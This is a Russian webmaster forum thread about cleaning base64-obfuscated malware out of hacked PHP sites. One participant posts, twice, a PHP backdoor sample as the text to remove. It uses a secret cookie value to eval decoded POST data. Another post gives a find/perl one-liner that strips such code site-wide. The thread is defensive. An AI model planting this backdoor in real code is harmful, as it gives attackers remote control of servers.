Удаляем вредоносный код (base64...) со своих сайтов.

**Kgtu5** · 17.04.2013 11:08

разницы нет какая вставка и куда засунули, экранирование работает отлично - удаляется все что требуется без проблем и синтаксических ошибок...

**Гендальф Серый** · 20.04.2013 23:35

Kgtu5, бывают случаи, когда экранирование не работает. Я в таких случая использую вспомогательный софт/программы для обнаружения/удаления червей с сайта.

**~~Flour~~** · 24.04.2013 00:36

Благодарю, часто сталкиваюсь с проблемой - скрытые ссылки в скриптах и шаблонах

**~~ASko~~** · 04.05.2013 22:28

У меня на всех сайтах, и во многих папках эта сволота наделал множество файликов с вот таким кодом:

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

Поясните, пожалуйста, что и как поставить в кавычки скрипта, чтобы эту мерзоту вычистить.
Заранее благодарен.

**Гендальф Серый** · 05.05.2013 17:30

$virus_text = '
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
';

---------- Сообщение добавлено 17:30 ---------- Предыдущее 17:29 ----------

$virus_text = '
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
';

**~~ASko~~** · 06.05.2013 01:31

Гендальф Серый, спасибо, но не проходит...
пишет:
"На веб-сайте произошла ошибка при получении _http://qqq.aa/delvir.php. Веб-сайт может быть закрыт на обслуживание или настроен неправильно."

**Docadept** · 06.05.2013 01:36

Скрипт неплохой, но предпочитаю работать ручками, а то ведь так человек может заподозрить какой-то кусок кода, как вредоносный, а он окажется частью стандартного и все, каюк CMS. Кусок вызова функции, к примеру. Делайте бэкапы перед обработкой - забыли написать)

**~~ASko~~** · 06.05.2013 21:48

Docadept, руками конечно лучше, а как вы их ищите?

**Гендальф Серый** · 02.06.2013 02:59

Господа, новая инфа про злополучный base64:

1. Коннектимся к серверу по SSH
2. выполняем команду

find . -type f -name '*.php' -exec perl -pi -e 's/eval$base64_decode\(\"DQp.*p9\"$\)\;//g' '{}' \;

3. done!

Если хостер не дал доступ по SSH - смело требуем от ТП, чтобы они выполнили вышеописанные действия.

**thirus** · 24.12.2013 00:25

во , спасибо большое автору) а то задолбался бороться уже с кодом уже этим вредоносным(

	17.04.2013 11:08 #21
Kgtu5 Новичок Регистрация: 05.03.2013 Сообщений: 25 Репутация: 2	разницы нет какая вставка и куда засунули, экранирование работает отлично - удаляется все что требуется без проблем и синтаксических ошибок...
0 Kgtu5

	20.04.2013 23:35 #22
Гендальф Серый You shall not pass. Ага. Регистрация: 02.02.2013 Сообщений: 1,184 Репутация: 1512 Webmoney BL: ?	Kgtu5, бывают случаи, когда экранирование не работает. Я в таких случая использую вспомогательный софт/программы для обнаружения/удаления червей с сайта.
0 Гендальф Серый

	24.04.2013 00:36 #23
~~Flour~~ Banned Регистрация: 30.11.2011 Сообщений: 120 Репутация: 20	Благодарю, часто сталкиваюсь с проблемой - скрытые ссылки в скриптах и шаблонах
0 Flour

	05.05.2013 17:30 #25
Гендальф Серый You shall not pass. Ага. Регистрация: 02.02.2013 Сообщений: 1,184 Репутация: 1512 Webmoney BL: ?	$virus_text = ' if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){ if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){ echo '<textarea id=areatext>'; eval($msg); echo '</textarea>bg'; exit; }} '; ---------- Сообщение добавлено 17:30 ---------- Предыдущее 17:29 ---------- $virus_text = ' if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){ if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){ echo '<textarea id=areatext>'; eval($msg); echo '</textarea>bg'; exit; }} ';
0 Гендальф Серый

	06.05.2013 01:31 #26
~~ASko~~ Banned Регистрация: 18.06.2011 Сообщений: 328 Репутация: 47 Webmoney BL: ?	Гендальф Серый, спасибо, но не проходит... пишет: "На веб-сайте произошла ошибка при получении _http://qqq.aa/delvir.php. Веб-сайт может быть закрыт на обслуживание или настроен неправильно."
0 ASko

Удаляем вредоносный код (base64...) со своих сайтов.

Опции темы

Тэги топика:

Похожие темы

Где вы берете картинки и фото для своих сайтов?

Аккаунты twitter для индексации своих сайтов

Несколько своих сайтов: мобильная тематика и туризм

Продаю ссылки со своих сайтов (чаты).

Удаляем вредоносный код (фрейм) из DLE сайта

Тем:

Сообщений:

Пользователей:

Сейчас на сайте:

Вход

Сайт

Разделы

Прочее

Следите за нами

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Золотые темы форума

Последние новости

Популярные темы

Информеры

	06.05.2013 01:36 #27
Docadept Гуру Регистрация: 15.04.2011 Сообщений: 627 Репутация: 232 Webmoney BL: ?	Скрипт неплохой, но предпочитаю работать ручками, а то ведь так человек может заподозрить какой-то кусок кода, как вредоносный, а он окажется частью стандартного и все, каюк CMS. Кусок вызова функции, к примеру. Делайте бэкапы перед обработкой - забыли написать)
0 Docadept

	06.05.2013 21:48 #28
~~ASko~~ Banned Регистрация: 18.06.2011 Сообщений: 328 Репутация: 47 Webmoney BL: ?	Docadept, руками конечно лучше, а как вы их ищите?
0 ASko

	02.06.2013 02:59 #29
Гендальф Серый You shall not pass. Ага. Регистрация: 02.02.2013 Сообщений: 1,184 Репутация: 1512 Webmoney BL: ?	Господа, новая инфа про злополучный base64: 1. Коннектимся к серверу по SSH 2. выполняем команду find . -type f -name '.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.p9\"\)\)\;//g' '{}' \; 3. done! Если хостер не дал доступ по SSH - смело требуем от ТП, чтобы они выполнили вышеописанные действия.
0 Гендальф Серый

	24.12.2013 00:25 #30
thirus Новичок Регистрация: 27.06.2012 Сообщений: 21 Репутация: 0 Webmoney BL: ?	во , спасибо большое автору) а то задолбался бороться уже с кодом уже этим вредоносным(
-2 thirus

Темы	Раздел	Ответов	Последний пост
Где вы берете картинки и фото для своих сайтов?	Вопросы от новичков	36	02.01.2015 01:15
Аккаунты twitter для индексации своих сайтов	Услуги по SEO	5	27.01.2013 18:38
Несколько своих сайтов: мобильная тематика и туризм	Покупка продажа сайтов	6	12.06.2012 02:00
Продаю ссылки со своих сайтов (чаты).	Ссылки, статьи	0	16.02.2012 17:54
Удаляем вредоносный код (фрейм) из DLE сайта	Дайджест блогосферы	0	24.01.2011 20:30